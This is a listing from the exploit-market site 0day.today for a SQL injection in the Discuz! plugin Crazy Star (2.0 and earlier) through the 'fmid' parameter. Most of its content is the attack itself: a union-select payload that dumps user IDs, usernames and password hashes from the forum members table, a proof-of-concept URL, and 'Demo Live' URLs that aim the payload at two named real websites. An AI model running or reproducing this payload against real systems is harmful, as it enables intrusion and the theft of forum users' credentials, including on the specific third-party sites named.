[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Discuz! Plugin Crazy Star <= 2.0 (fmid) SQL Injection Vulnerability

Author
ZhaoHuAn
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-5700
Category
web applications
Date add
25-08-2009
Platform
unsorted
===================================================================
Discuz! Plugin Crazy Star <= 2.0 (fmid) SQL Injection Vulnerability
===================================================================


============================================================
Discuz! Plugin Crazy Star <= 2.0 Sql injection Vulnerability
============================================================

========================[Author]============================                    

 [+] Founded 	: ZhaoHuAn				     	         
 [+] Blog	: http://www.patching.net/zhaohuan/	         
 [+] Date	: August, 26th 2009 [Double Seventh Festival]	 
								 
========================[Soft Info]=========================		 
								 
Software: Discuz! Plugin Crazy Star(family)		         
Version	: 2.0					                 
Vendor	: http://www.discuz.com			             	 



[-] Exploit:
[+] 1) Register a User
    2) Login!
[+] and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,group_concat(uid,0x3a,username,0x3a,password),25,26,27,28,29,30,31 from cdb_members--

[-] SqlI PoC:
[+] http://target/[path]/plugin.php?identifier=family&module=family&action=view&fmid=1+and+1=2+unIon+selecT+ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,group_concat(uid,0x3a,username,0x3a,password),25,26,27,28,29,30,31 from cdb_members--
    [?] = Valid fmid Number

[+] Demo Live:
[-] http://sj.netease.com/plugin.php?identifier=family&module=family&action=view&fmid=6+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,group_concat(uid,0x3a,username,0x3a,password),19,20,21,22,23,24,25,26,27,28,29,30,31 from bbs_members--

[-] http://www.war3club.net/plugin.php?identifier=family&module=family&action=view&fmid=11+and+1=2+unIon+selecT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,group_concat(uid,0x3a,username,0x3a,password),25,26,27,28,29,30,31,32,33 from cdb_members--


/---------------------------------------------www.zhaohuan.net-------------------------------------------------\  

  Today is the VALENTINE'S Day in China, the seventh day of the seventh lunar month.
  Raise your head on August 26 and gaze at the stars, you will find something romantic going on in the sky  ;) 
  Greetz : Weeny <- love u more & more

\--------------------------------------------------------------------------------------------------------------/





#  0day.today [2024-12-25]  #